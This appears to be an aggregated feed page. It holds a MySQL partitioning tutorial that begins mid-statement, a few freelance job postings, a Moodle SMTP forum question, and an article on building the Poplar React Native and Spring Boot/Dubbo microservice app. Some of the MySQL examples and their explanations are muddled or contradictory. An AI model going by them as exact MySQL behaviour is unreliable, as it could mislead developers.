    sales_forecast_updated TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) PARTITION BY RANGE ( UNIX_TIMESTAMP(sales_forecast_updated) ) (
    PARTITION p0 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-01-01 00:00:00') ),
    PARTITION p1 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-04-01 00:00:00') ),
    PARTITION p2 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-07-01 00:00:00') ),
    PARTITION p3 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-10-01 00:00:00') ),
    PARTITION p4 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-01-01 00:00:00') ),
    PARTITION p5 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-04-01 00:00:00') ),
    PARTITION p6 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-07-01 00:00:00') ),
    PARTITION p7 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-10-01 00:00:00') ),
    PARTITION p8 VALUES LESS THAN ( UNIX_TIMESTAMP('2010-01-01 00:00:00') ),
    PARTITION p9 VALUES LESS THAN (MAXVALUE)
);

LIST partitioning

The difference between RANGE and LIST partitioning is that in LIST partitioning each partition is defined by an explicit list of values of a specific column.
You do this with PARTITION BY LIST (expr), where expr is the column (or expression) selected for list partitioning. LIST partitioning is shown in the example below:

CREATE TABLE students (
    student_id INT NOT NULL,
    student_fname VARCHAR(30),
    student_lname VARCHAR(30),
    student_joined DATE NOT NULL DEFAULT '1970-01-01',
    student_separated DATE NOT NULL DEFAULT '9999-12-31',
    student_house INT,
    student_grade_id INT
) PARTITION BY LIST(student_grade_id) (
    PARTITION P1 VALUES IN (1,2,3,4),
    PARTITION P2 VALUES IN (5,6,7),
    PARTITION P3 VALUES IN (8,9,10),
    PARTITION P4 VALUES IN (11,12)
);

HASH partitioning

HASH partitioning distributes data evenly among a predetermined number of partitions. With RANGE and LIST partitioning you must explicitly define the partitioning logic and which partition a given column value (or set of column values) is stored in; with HASH partitioning MySQL takes care of this. The following example explains HASH partitioning better:

CREATE TABLE store (
    store_id INT NOT NULL,
    store_name VARCHAR(30),
    store_location VARCHAR(30),
    store_started DATE NOT NULL DEFAULT '1997-01-01',
    store_code INT
) PARTITION BY HASH(store_id) PARTITIONS 4;

P.S.: If you do not include a PARTITIONS clause, the number of partitions defaults to 1.

LINEAR HASH partitioning

LINEAR HASH partitioning uses a linear powers-of-two algorithm, whereas HASH partitioning uses the modulus of the hashing function's value. Please find below a LINEAR HASH partitioning example:

CREATE TABLE store (
    store_id INT NOT NULL,
    store_name VARCHAR(30),
    store_location VARCHAR(30),
    store_started DATE NOT NULL DEFAULT '1997-01-01',
    store_code INT
) PARTITION BY LINEAR HASH( YEAR(store_started) ) PARTITIONS 4;

KEY partitioning

KEY partitioning is very similar to HASH; the only difference is that the hashing function for KEY partitioning is supplied by MySQL. For MySQL NDB Cluster, MD5() is used; for tables using other storage engines, the MySQL server uses a storage-engine-specific hashing function based on the same algorithm as PASSWORD().

CREATE TABLE contact (
    id INT NOT NULL,
    name VARCHAR(20),
    contact_number INT,
    email VARCHAR(50),
    UNIQUE KEY (id)
) PARTITION BY KEY() PARTITIONS 5;

P.S.: If the unique key column were not defined as NOT NULL, the previous statement would fail.

Subpartitioning

Subpartitioning is also known as composite partitioning; you can partition a table combining RANGE and HASH for better results. The example below explains subpartitioning better:

CREATE TABLE purchase (id INT, item VARCHAR(30), purchase_date DATE)
PARTITION BY RANGE( YEAR(purchase_date) )
SUBPARTITION BY HASH( TO_DAYS(purchase_date) )
SUBPARTITIONS 2 (
    PARTITION p0 VALUES LESS THAN (2000),
    PARTITION p1 VALUES LESS THAN (2010),
    PARTITION p2 VALUES LESS THAN MAXVALUE
);

It is also possible to define subpartitions explicitly, using SUBPARTITION clauses to specify options for individual subpartitions:

CREATE TABLE purchase (id INT, item VARCHAR(30), purchase_date DATE)
PARTITION BY RANGE( YEAR(purchase_date) )
SUBPARTITION BY HASH( TO_DAYS(purchase_date) ) (
    PARTITION p0 VALUES LESS THAN (2000) ( SUBPARTITION s0, SUBPARTITION s1 ),
    PARTITION p1 VALUES LESS THAN (2010) ( SUBPARTITION s2, SUBPARTITION s3 ),
    PARTITION p2 VALUES LESS THAN MAXVALUE ( SUBPARTITION s4, SUBPARTITION s5 )
);

Things to remember:
- Each partition must have the same number of subpartitions.
- Each SUBPARTITION clause must include (at a minimum) a name for the subpartition.
  Otherwise, you may set any desired option for the subpartition or allow it to assume its default setting for that option.
- Subpartition names must be unique across the entire table.

For example, the following CREATE TABLE statement is valid in MySQL 5.7:

CREATE TABLE purchase (id INT, item VARCHAR(30), purchase_date DATE)
PARTITION BY RANGE( YEAR(purchase_date) )
SUBPARTITION BY HASH( TO_DAYS(purchase_date) ) (
    PARTITION p0 VALUES LESS THAN (1990) ( SUBPARTITION s0, SUBPARTITION s1 ),
    PARTITION p1 VALUES LESS THAN (2000) ( SUBPARTITION s2, SUBPARTITION s3 ),
    PARTITION p2 VALUES LESS THAN MAXVALUE ( SUBPARTITION s4, SUBPARTITION s5 )
);

MySQL partitioning limitations

MySQL partitioning also has limitations; they are listed below.

A PRIMARY KEY must include all columns in the table's partitioning function:

CREATE TABLE tab3 (
    column1 INT NOT NULL,
    column2 DATE NOT NULL,
    column3 INT NOT NULL,
    column4 INT NOT NULL,
    UNIQUE KEY (column1, column2),
    UNIQUE KEY (column3)
) PARTITION BY HASH(column1 + column3) PARTITIONS 4;

Expect this error after running the above script: ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table's partitioning function

The right way of doing it:

CREATE TABLE table12 (
    column1 INT NOT NULL,
    column2 DATE NOT NULL,
    column3 INT NOT NULL,
    column4 INT NOT NULL,
    UNIQUE KEY (column1, column2, column3)
) PARTITION BY HASH(column3) PARTITIONS 5;

CREATE TABLE table25 (
    column11 INT NOT NULL,
    column12 DATE NOT NULL,
    column13 INT NOT NULL,
    column14 INT NOT NULL,
    UNIQUE KEY (column11, column13)
) PARTITION BY HASH(column11 + column13) PARTITIONS 5;

The best-known limitation of MySQL partitioning: since a primary key is by definition a unique key, this restriction also includes the table's primary key, if it has one. The example below explains this limitation better:

CREATE TABLE table55 (
    column11 INT NOT NULL,
    column12 DATE NOT NULL,
    column13 INT NOT NULL,
    column14 INT NOT NULL,
    PRIMARY KEY(column11, column12)
) PARTITION BY HASH(column13) PARTITIONS 4;

CREATE TABLE table65 (
    column20 INT NOT NULL,
    column25 DATE NOT NULL,
    column30 INT NOT NULL,
    column35 INT NOT NULL,
    PRIMARY KEY(column20, column30),
    UNIQUE KEY(column25)
) PARTITION BY HASH( YEAR(column25) ) PARTITIONS 5;

Both of the above scripts return this error: ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table's partitioning function

The right way of doing it:

CREATE TABLE t45 (
    column50 INT NOT NULL,
    column55 DATE NOT NULL,
    column60 INT NOT NULL,
    column65 INT NOT NULL,
    PRIMARY KEY(column50, column55)
) PARTITION BY HASH(column50 + YEAR(column55)) PARTITIONS 5;

CREATE TABLE table88 (
    column80 INT NOT NULL,
    column81 DATE NOT NULL,
    column82 INT NOT NULL,
    column83 INT NOT NULL,
    PRIMARY KEY(column80, column81, column82),
    UNIQUE KEY(column81, column82)
);

In the above example, the primary key does not include all columns referenced in the partitioning expression. However, both of the statements are valid!
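Incidentally, a handy way to check how an existing table is partitioned and how rows are spread across its partitions is INFORMATION_SCHEMA (a hedged sketch, shown here for the table12 example above; TABLE_ROWS is approximate for InnoDB):

SELECT PARTITION_NAME, PARTITION_METHOD, TABLE_ROWS
FROM INFORMATION_SCHEMA.PARTITIONS
WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = 'table12';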
You can still successfully partition a MySQL table without unique keys (including having no primary key), and you may use any column or columns in the partitioning expression as long as the column type is compatible with the partitioning type. The example below shows partitioning a table with no unique or primary keys:

CREATE TABLE table_has_no_pk (column10 INT, column11 INT, column12 varchar(20))
PARTITION BY RANGE(column10) (
    PARTITION p0 VALUES LESS THAN (500),
    PARTITION p1 VALUES LESS THAN (600),
    PARTITION p2 VALUES LESS THAN (700),
    PARTITION p3 VALUES LESS THAN (800)
);

You cannot later add a unique key to a partitioned table unless the key includes all columns used by the table's partitioning expression. The example below explains this much better:

ALTER TABLE table_has_no_pk ADD PRIMARY KEY(column10);
ALTER TABLE table_has_no_pk DROP PRIMARY KEY;
ALTER TABLE table_has_no_pk ADD PRIMARY KEY(column10,column11);
ALTER TABLE table_has_no_pk DROP PRIMARY KEY;

However, the next statement fails, because column10 is part of the partitioning key but is not part of the proposed primary key:

mysql> ALTER TABLE table_has_no_pk ADD PRIMARY KEY(column11);
ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table's partitioning function
mysql>

MySQL partitioning limitations (at storage engine level)

InnoDB:
- InnoDB foreign keys and MySQL partitioning are not compatible. Partitioned InnoDB tables cannot have foreign key references, nor can they have columns referenced by foreign keys, so you cannot partition InnoDB tables that have, or are referenced by, foreign keys.
- InnoDB does not support the use of multiple disks for subpartitions (MyISAM supports this feature).
- Use ALTER TABLE … REBUILD PARTITION and ALTER TABLE … ANALYZE PARTITION rather than ALTER TABLE … OPTIMIZE PARTITION.

NDB storage engine: we can only partition by KEY (including LINEAR KEY) in the NDB storage engine.

FEDERATED storage engine: partitioning is not supported.

CSV storage engine: partitioning is not supported.

MERGE storage engine: tables using the MERGE storage engine cannot be partitioned, and partitioned tables cannot be merged.

The MySQL functions shown in the following list are allowed in partitioning expressions: ABS(), CEILING(), DATEDIFF(), DAY(), DAYOFMONTH(), DAYOFWEEK(), DAYOFYEAR(), EXTRACT(), FLOOR(), HOUR(), MICROSECOND(), MINUTE(), MOD(), MONTH(), QUARTER(), SECOND(), TIME_TO_SEC(), TO_DAYS(), TO_SECONDS(), UNIX_TIMESTAMP(), WEEKDAY(), YEAR(), YEARWEEK()

MySQL partitioning and locks

Effect on DML statements:
- In MySQL 5.7, updating a partitioned MyISAM table causes only the affected partitions to be locked.
- SELECT statements (including those containing unions or joins) lock only those partitions that actually need to be read. This also applies to SELECT … PARTITION.
- An UPDATE prunes locks only for tables on which no partitioning columns are updated.
- REPLACE and INSERT lock only those partitions having rows to be inserted or replaced. However, if an AUTO_INCREMENT value is generated for any partitioning column then all partitions are locked.
- INSERT … ON DUPLICATE KEY UPDATE is pruned as long as no partitioning column is updated.
- INSERT … SELECT locks only those partitions in the source table that need to be read, although all partitions in the target table are locked.
- Locks imposed by LOAD DATA statements on partitioned tables cannot be pruned.

Effect on DDL statements:
- CREATE VIEW does not cause any locks.
- ALTER TABLE … EXCHANGE PARTITION prunes locks; only the exchanged table and the exchanged partition are locked.
- ALTER TABLE … TRUNCATE PARTITION prunes locks; only the partitions to be emptied are locked.
- In addition, ALTER TABLE statements take metadata locks at the table level.

Effect on other statements:
- LOCK TABLES cannot prune partition locks.
- CALL stored_procedure(expr) supports lock pruning, but evaluating expr does not.
- DO and SET statements do not support partitioning lock pruning.

The post What is MySQL partitioning? appeared first on MySQL Consulting, Support and Remote DBA Services.
          Fix image upload issue in Magento 1.9.3.8
We recently migrated to Magento 1.9.3.8 from 1.7. All functionality seems to be there except for product image uploading. We are looking for a developer very experienced with Magento to resolve this issue. (Budget: $30 - $250 USD, Jobs: HTML, Javascript, Magento, MySQL, PHP)
          SMTP Gmail delay while sending emails
by Vytautas Krasauskas.  

Hello,

Moodle version 3.5.1

Ubuntu 18.04 digitalocean droplet

standard apache/mysql/php install from the repos

this is a restored setup from a different host. Email has never been configured before, cannot check if it worked.

cronjob is running

smtp host: smtp.gmail.com:587 (same behaviour as without the port being specified)

smtp security: tls

smtp auth type: any, they all behave the same

username: appropriate username

password: app specific password

smtp limit: 1

captcha thing done


At first I was testing using the forgotten password function, but later installed the mail test plugin. Behaviour is the same - email gets delivered, but it takes about 2.5 - 3 minutes for it to arrive. In the mean time, the page keeps loading. Clicking any other internal link does not work, the page just keeps loading until the email eventually gets sent. Same behaviour with new user registration. This makes me want to tear my hair out.

Any suggestions?

Sincerely yours.


          Change table design & function
Change table design & function. I want to make it like the attached file. Currently: https://collab.id/project/Membuat-aplikasi-handphoneamskj (login with Google/Facebook). (Budget: $2 - $8 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Scraping the Website
Need to develop a program to scrape data from various websites that require a username and password. Data will be searched by a size parameter, and I would like to scrape the sizes of the product... (Budget: $30 - $250 USD, Jobs: Data Mining, MySQL, PHP, Software Architecture, Web Scraping)
          Telecommute Java8 Developer in Atlanta
A staffing agency is searching for a person to fill their position for a Telecommute Java 8 Developer in Atlanta. The individual must be able to fulfill the following responsibilities:
- Work with a talented team of technologists
- Use the latest technology, tools, and methodologies
- Perform tons of new development and update architecture
Skills and requirements include:
- Expert-level development experience with Java 8 (or later)
- Solid experience with Spring/Spring Boot and all company-required technologies
- Experience with API development and web services (REST / HATEOAS)
- Experience with Docker, Maven, or similar tools
- Experience with relational databases (SQL, MySQL, etc.)
- 7+ years of Java development experience
          From React Native to Microservices: Shipping a Full-Stack Solution

Poplar is a social-themed content community, but it is not a community in itself; it aims to provide an open-source foundation kit that can be quickly built upon. The front end is built with React Native and Redux, and the back end is a set of microservices composed of Spring Boot, Dubbo and Zookeeper that expose a consistent API.

https://github.com/lvwangbeta/Poplar

Although React Native offers a cross-platform solution, it does not compromise much on performance or development efficiency, and developers with a JS and CSS background will not find it hard to pick up. The JSX syntax sugar does take some getting used to, and whether you like having DOM structure, styles and JS logic written together is a matter of taste, but it is also a good way of forcing you to modularize and decouple. Because data flow in React components is one-way, a troublesome problem arises: components cannot communicate with each other efficiently. Communication between two deeply nested sibling nodes in particular becomes extremely complex, polluting every upstream parent node with pass-through props and making maintenance very costly. For this reason Poplar introduces the Redux architecture to manage application state in one place.

Modularization

The app consists of five basic pages: the feed home page (MainPage), the explore page (ExplorePage), the account details page (MinePage), the status creation and posting page (NewFeed), and the login/registration page (LoginRegPage). Pages in turn are composed of basic components such as the feed list, feed detail, comments, tags and albums. All interaction with the server is handled by the API layer.

The bottom of the screen is a TabNavigator containing five TabNavigator.Item entries, one per basic page; if the user is not logged in, tapping the home tab or the new-post tab brings up the login/registration page.

Redux

Introducing Redux is not about chasing a trend; the Flux concept was already proposed back in 2014. Redux is used here mainly out of necessity: Poplar's component structure is not especially complex, but there is a lot of nesting, and the feed must be reachable in both the logged-in and logged-out states. That calls for a unified state manager to coordinate communication and state updates between components, and Redux solves this problem well.

Rather than giving a dry walkthrough of the Redux architecture, let's take the login state in Poplar as an example and briefly look at how Redux is used in the project.

Poplar uses the React-Redux library, an implementation that binds the Redux architecture to React.

1. Scenario

When the user is not logged in, tapping the feed page pops up the login/registration page; after a successful login or registration the page is dismissed and the feed content is refreshed. The App component is the common parent of the login page and the feed home page, which are sibling nodes.

This requirement looks simple, but without Redux it is clumsy to implement in React and produces a lot of redundant plumbing.

First, how would this flow be implemented without Redux?

When the first Tabbar item (the feed tab) is tapped, we have to check whether the user is logged in, for example by checking whether a token is stored locally or via some other verification. If the user is not logged in, the App component has to update its own state and pass that change down to LoginPage via props; LoginPage, seeing the new props, updates its own state to {visible: true} to show itself. If the user enters credentials and logs in successfully, LoginPage sets its state to {visible: false} to hide itself and invokes the callback App handed to it, telling the parent that login succeeded. Count it up: this exchange between just two components already costs one props variable, one props callback and two state updates, and all it accomplishes is LoginPage telling App that the application should now be in the logged-in state. The user's feed still has not been refreshed, because MainPage does not yet know the user is logged in; the App parent has to tell it to refresh. But how? React's data flow is one-way, so the only way to make a lower-level component update is to pass changed props, which adds yet another props property. MainPage then updates its related state and refreshes itself to fetch the feed, and only then is the post-login MainPage finally displayed. From this analysis you can see that the transition from logged-out to logged-in forces Poplar into a lot of redundant yet unavoidable parameter passing: the sibling nodes LoginPage and MainPage cannot easily tell each other their state, so they need the App parent as a bridge, passing messages first upward and then back down.

Now let's see how the same flow works once Redux is introduced.

Again the user taps the home tab while logged out. With Redux in place, Poplar has already initialized a global login state {status: 'NOT_LOGGED_IN'}; when the user logs in successfully this state is updated to {status: 'LOGGED_IN'}. LoginPage is bound to this state, so Redux immediately notifies it to update its own state to {visible: false}. At the same time App is bound to the same Redux-managed global state, so it receives the {status: 'LOGGED_IN'} notification as well and can simply hide LoginPage and show MainPage once the user has logged in. Simple and almost magical: there is no more passing parameters level by level; a component just binds to whichever global state it cares about and Redux notifies it right away.

2. Implementation

Let's walk through the React-Redux implementation of this scenario using the actual code.

connect

In the App component, the connect method turns the UI component into a Redux container component; you can think of it as the bridge between the UI component and Redux, tying the store to the component.

import {showLoginPage, isLogin} from  './actions/loginAction';
import {showNewFeedPage} from './actions/NewFeedAction';

export default connect((state) => ({
  status: state.isLogin.status, // login status
  loginPageVisible: state.showLoginPage.loginPageVisible
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: () => dispatch(showLoginPage()),
  showNewFeedPage: () => dispatch(showNewFeedPage()),
}))(App)

The first argument to connect is the mapStateToProps function, which establishes a mapping from data in the store to the UI component's props object. Whenever the store is updated, mapStateToProps is called; it returns an object that maps UI component props to store data. In the code above, mapStateToProps receives state as a parameter and returns a mapping between the UI component's login status and the login status in the store's state, plus a mapping for whether the login page is visible. The App component's state is now tied to the Redux store.

The second argument, the mapDispatchToProps function, lets you bind actions to the component as props; it returns a mapping between UI component props and Redux actions. In the code above, the App component's isLogin, showLoginPage and showNewFeedPage props are mapped to Redux actions. Calling isLogin actually calls store.dispatch(isLogin()) in Redux, and dispatch takes care of delivering the action to the reducer.

Provider

How does the state get passed into connect? React-Redux provides the Provider component, which lets container components get hold of the state.

import React, { Component } from 'react';
import { Provider } from 'react-redux';
import configureStore from './src/store/index';

const store = configureStore();

export default class Root extends Component {
  render() {
    return (
      <Provider store={store}>
        <Main />
      </Provider>
    )
  }
}

In the code above, Provider wraps the root component, so all of App's child components can get the state by default.

Action & Reducer

Binding components to the Redux global state is now in place, but how does the state actually flow? How does the login state spread through the whole application?

This is where Redux actions and reducers come in: an action receives events from the UI components, and a reducer responds to the action, returning the new store state and triggering updates in the UI components bound to the store.

export default connect((state) => ({
  loginPageVisible: state.showLoginPage.loginPageVisible,
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: (flag) => dispatch(showLoginPage(flag)),
  showRegPage: (flag) => dispatch(showRegPage(flag)),
}))(LoginPage)

this.props.showLoginPage(false);
this.props.isLogin();

In this login scenario, as in the code above, LoginPage binds its props to the store and to actions. On a successful login it calls the showLoginPage(false) action to hide itself, and the reducer receives the dispatched action and updates the store state:

//Action
export function showLoginPage(flag=true) {
  if(flag == true) {
    return {
      type: 'LOGIN_PAGE_VISIBLE'
    }
  } else {
    return {
      type: 'LOGIN_PAGE_INVISIBLE'
    }
  }
}

//Reducer
export function showLoginPage(state=pageState, action) {
  switch (action.type) {
    case 'LOGIN_PAGE_VISIBLE':
      return {
        ...state,
        loginPageVisible: true,
      }
      break;
    case 'LOGIN_PAGE_INVISIBLE':
      return {
        ...state,
        loginPageVisible: false,
      }
      break;
    default:
      return state;
  }
}

At the same time it calls the isLogin action to update the application's global state to logged-in:

//Action
export function isLogin() {
  return dispatch => {
      Secret.isLogin((result, token) => {
        if(result) {
          dispatch({
            type: 'LOGGED_IN',
          });
        } else {
          dispatch({
            type: 'NOT_LOGGED_IN',
          });
        }
      });
  }
}

//Reducer
export function isLogin(state=loginStatus, action) {
    switch (action.type) {
      case 'LOGGED_IN':
        return {
          ...state,
          status: 'LOGGED_IN',
        }
        break;
      case 'NOT_LOGGED_IN':
        return {
          ...state,
          status: 'NOT_LOGGED_IN',
        }
        break;
      default:
        return state;
    }
}

Because the App component is bound to this global login state, once the reducer updates it App receives the update as well and re-renders itself, and at that point MainPage is rendered:

const {status} = this.props;
return (
  <TabNavigator>
    <TabNavigator.Item
      selected={this.state.selectedTab === 'mainTab'}
      renderIcon={() => <Image style={styles.icon} 
                         source={require('./imgs/icons/home.png')} />}
      renderSelectedIcon={() => <Image style={styles.icon} 
                          source={require('./imgs/icons/home_selected.png')} />}
      onPress={() => {
                      this.setState({ selectedTab: 'mainTab' });
                      if(status == 'NOT_LOGGED_IN') {
                        showLoginPage();
                      }
                  }
               }
    >
	  // the global status has changed from NOT_LOGGED_IN to LOGGED_IN
      {status == 'NOT_LOGGED_IN'?<LoginPage {...this.props}/>:<MainPage {...this.props}/>}

Project Build & Development

1. Project Structure

poplar is the umbrella Maven project; the top level has no business functionality and no code of its own, and provides the base pom dependency imports for the modules beneath it
poplar-api plays a dual role: as the API gateway it receives and routes channel-layer requests, and as a microservice consumer it orchestrates calls to the providers to chain services together
poplar-user-service: a microservice provider offering registration, login, user management and related services
poplar-feed-service: a microservice provider offering feed creation, timeline generation and related services
poplar-notice-service: a microservice provider offering the notification service

Each subproject is created separately as a Module.

2. Maven Aggregation Project

Poplar is made up of several service providers, consumers and shared components, whose dependencies include both peer associations and parent-child relationships. To simplify configuration and allow a unified build, sensible dependencies need to be set up. The service providers are mainly Spring Boot projects, with dependencies such as database access; the service consumers are also Spring Boot projects, but as the API layer they expose external interfaces and therefore need Controller support. Consumers and providers call each other through Dubbo, which requires a shared Dubbo component. So consumers and providers both depend on Spring Boot and Dubbo, and we can simply extract a parent pom that defines the shared parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>pom</packaging>

<name>poplar</name>
<description>Poplar</description>
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-data-redis</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-jdbc</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>    
    ...
</dependencies>

Besides importing the shared build dependencies, the Poplar parent also has to declare the submodules it contains, so that when building from the top level Maven's reactor can work out the dependency relationships and build order of the modules. We add the service providers and consumers:

 <modules>
    <module>poplar-common</module>
    <module>poplar-api</module>
    <module>poplar-feed-service</module>
    <module>poplar-user-service</module>
</modules>

The child modules' pom files become much simpler: just specify the parent, with the pom source given as a relative path to the parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-api</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>war</packaging>

<name>poplar-api</name>
<description>poplar api</description>

<parent>
    <groupId>com.lvwangbeta</groupId>
    <artifactId>poplar</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <relativePath>../pom.xml</relativePath> <!-- lookup parent from repository -->
</parent>   

There is one more shared artifact we have not yet discussed. It mainly contains the interfaces, models and utility methods shared by consumers and providers; it needs no Spring dependency and no database access. It is a common component referenced by the other projects, so we simply declare it as a local package with jar packaging; it does not need to depend on the parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-common</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>

When the project is packaged as a whole, Maven works out that the other subprojects depend on this local jar and installs it into the local Maven repository first. Run mvn clean install in the Poplar project root and look at the build order: the subprojects are not built in the order we declared in the Poplar pom; instead, Maven's reactor computes each module's dependencies and builds accordingly, first the shared common package, then poplar, and finally the consumers and providers.

[INFO] Reactor Summary:
[INFO]
[INFO] poplar-common ...................................... SUCCESS [ 3.341 s]
[INFO] poplar ............................................. SUCCESS [ 3.034 s]
[INFO] poplar-api ......................................... SUCCESS [ 25.028 s]
[INFO] poplar-feed-service ................................ SUCCESS [ 6.451 s]
[INFO] poplar-user-service ................................ SUCCESS [ 8.056 s]
[INFO] ------------------------------------------------------------------

If we have only changed a few subprojects there is no need for a full build: use Maven's -pl option to select the projects and -am to also build the modules they depend on. Let's try building just poplar-api, which depends on poplar-common and poplar:

mvn clean install -pl poplar-api -am  

Running the build, we can see that Maven first builds poplar-common and poplar, which poplar-api depends on, and then builds poplar-api itself:

[INFO] Reactor Summary:
[INFO] [INFO] poplar-common ...................................... SUCCESS [ 2.536 s]
[INFO] poplar ............................................. SUCCESS [ 1.756 s]
[INFO] poplar-api ......................................... SUCCESS [ 28.101 s]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS

3. Dubbo & Zookeeper

The service providers and consumers described above rely on Dubbo for remote calls, but a registry is still needed to register the providers and notify the consumers. Zookeeper is one implementation of such a registry, and Poplar uses Zookeeper as its registry.

3.1 Installing Zookeeper

Download and extract the Zookeeper archive

$ cd zookeeper-3.4.6  
$ mkdir data  

Create the configuration file

$ vim conf/zoo.cfg

tickTime = 2000
dataDir = /path/to/zookeeper/data
clientPort = 2181
initLimit = 5
syncLimit = 2

Start it

$ bin/zkServer.sh start

Stop it

$ bin/zkServer.sh stop 

3.2 Dubbo admin

Install the Dubbo admin console

git clone https://github.com/apache/incubator-dubbo-ops
cd incubator-dubbo-ops && mvn package  

The packaged war can then be found in the target directory. Extract it into Tomcat's webapps/ROOT directory (empty the ROOT directory first). Have a look at the extracted dubbo.properties file, which specifies the IP and port of the Zookeeper registry:

dubbo.registry.address=zookeeper://127.0.0.1:2181
dubbo.admin.root.password=root
dubbo.admin.guest.password=guest

Start Tomcat

./bin/startup.sh

Visit

http://127.0.0.1:8080/

Dubbo is now set up to monitor the registry.

4. Development

Developing microservice providers and consumers is different from building a traditional monolith, but the logic is broadly the same; the registry simply means that a consumer and a provider must cooperate to serve a request, which in turn requires agreeing on interfaces and models between the two so that calls keep working.

Using user registration as an example, this section shows the complete development flow from the channel call to the service provider, the consumer and the publication of the common module.

4.1 Common Module

poplar-common is the shared module that defines the interfaces and models both consumers and providers depend on, so that the microservices can be reached properly once published.
Define the user service interface:

public interface UserService {
    String register(String username, String email, String password);
}

4.2 Service Provider

UserServiceImpl implements the UserService interface defined in poplar-common:

@Service
public class UserServiceImpl implements UserService {

    @Autowired
    @Qualifier("userDao")
    private UserDAO userDao;

    public String register(String username, String email, String password){
        if(email == null || email.length() <= 0)
            return Property.ERROR_EMAIL_EMPTY;

        if(!ValidateEmail(email))
            return Property.ERROR_EMAIL_FORMAT;
        ...
    }

As you can see, this is a plain Spring Boot service, but the @Service annotation must be the one from the Dubbo package so that Dubbo can scan the service and register it with Zookeeper:

dubbo.scan.basePackages = com.lvwangbeta.poplar.user.service

dubbo.application.id=poplar-user-service
dubbo.application.name=poplar-user-service

dubbo.registry.address=zookeeper://127.0.0.1:2181

dubbo.protocol.id=dubbo
dubbo.protocol.name=dubbo
dubbo.protocol.port=9001

4.3 Service Consumer

As mentioned earlier, poplar-api is both the API gateway and a service consumer, orchestrating calls to the providers to complete the request chain.

The API layer uses the @Reference annotation to request the service from the registry, and talks to the service provider over RPC through the UserService interface defined in the poplar-common module:

@RestController
@RequestMapping("/user")
public class UserController {

    @Reference
    private UserService userService;

    @ResponseBody
    @RequestMapping("/register")
    public Message register(String username, String email, String password) {
        Message message = new Message();
        String errno = userService.register(username, email, password);
        message.setErrno(errno);
        return message;
    }
} 

application.properties configuration:

dubbo.scan.basePackages = com.lvwangbeta.poplar.api.controller

dubbo.application.id=poplar-api
dubbo.application.name=poplar-api

dubbo.registry.address=zookeeper://127.0.0.1:2181 

5. Dockerizing the Services

If the steps above are done, a complete microservice architecture is essentially in place and you can start writing business code, so why bother with Dockerization? First, as business complexity grows, new microservice modules may be added, and it is useful to have a stable surrounding environment while developing a new module; if the test environment is lacking, you can start the necessary Docker containers yourself and save build time. It also reduces the stability problems that come with moving between environments, makes testing and deployment easier, and gives continuous integration a more convenient and efficient way to deploy.

Running build.sh in the poplar root directory Dockerizes all of poplar's microservice modules and starts them in one step:

cd poplar && ./build.sh

If you have the patience, the following two short sections explain how this is implemented.

5.1 Building the Images

Poplar Dockerizes each microservice, the databases and the registry separately: poplar-dubbo-admin is the Dubbo admin console; poplar-api, poplar-tag-service, poplar-action-service, poplar-feed-service and poplar-user-service are the concrete service-layer business modules; poplar-redis and poplar-mysql provide caching and persistent data storage; and poplar-zookeeper is the Zookeeper registry:

poplar-dubbo-admin
poplar-api
poplar-tag-service
poplar-action-service
poplar-feed-service
poplar-user-service
poplar-redis
poplar-mysql
poplar-zookeeper

The business-layer modules poplar-api, poplar-tag-service, poplar-action-service, poplar-feed-service, and poplar-user-service can be built with the docker-maven-plugin configured in pom.xml; specifying the working directory, base image, and other details in its configuration block removes the need for a separate Dockerfile:

<plugin>
    <groupId>com.spotify</groupId>
    <artifactId>docker-maven-plugin</artifactId>
    <version>1.0.0</version>
    <configuration>
        <imageName>lvwangbeta/poplar</imageName>
        <baseImage>java</baseImage>
        <maintainer>lvwangbeta lvwangbeta@163.com</maintainer>
        <workdir>/poplardir</workdir>
        <cmd>["java", "-version"]</cmd>
        <entryPoint>["java", "-jar", "${project.build.finalName}.jar"]</entryPoint>
        <skipDockerBuild>false</skipDockerBuild>
        <resources>
            <resource>
                <targetPath>/poplardir</targetPath>
                <directory>${project.build.directory}</directory>
                <include>${project.build.finalName}.jar</include>
            </resource>
        </resources>
    </configuration>
</plugin>

If you want a sub-project to skip the Docker build, set skipDockerBuild to true in that sub-project's pom.xml. For example, poplar-common is a shared dependency and does not need to be packaged as a standalone image:

<skipDockerBuild>true</skipDockerBuild>

Run the following command in the poplar project root to build the entire business layer:

mvn package -Pdocker  -Dmaven.test.skip=true docker:build
[INFO] Building image lvwangbeta/poplar-user-service
Step 1/6 : FROM java
 ---> d23bdf5b1b1b
Step 2/6 : MAINTAINER lvwangbeta lvwangbeta@163.com
 ---> Running in b7af524b49fb
 ---> 58796b8e728d
Removing intermediate container b7af524b49fb
Step 3/6 : WORKDIR /poplardir
 ---> e7b04b310ab4
Removing intermediate container 2206d7c78f6b
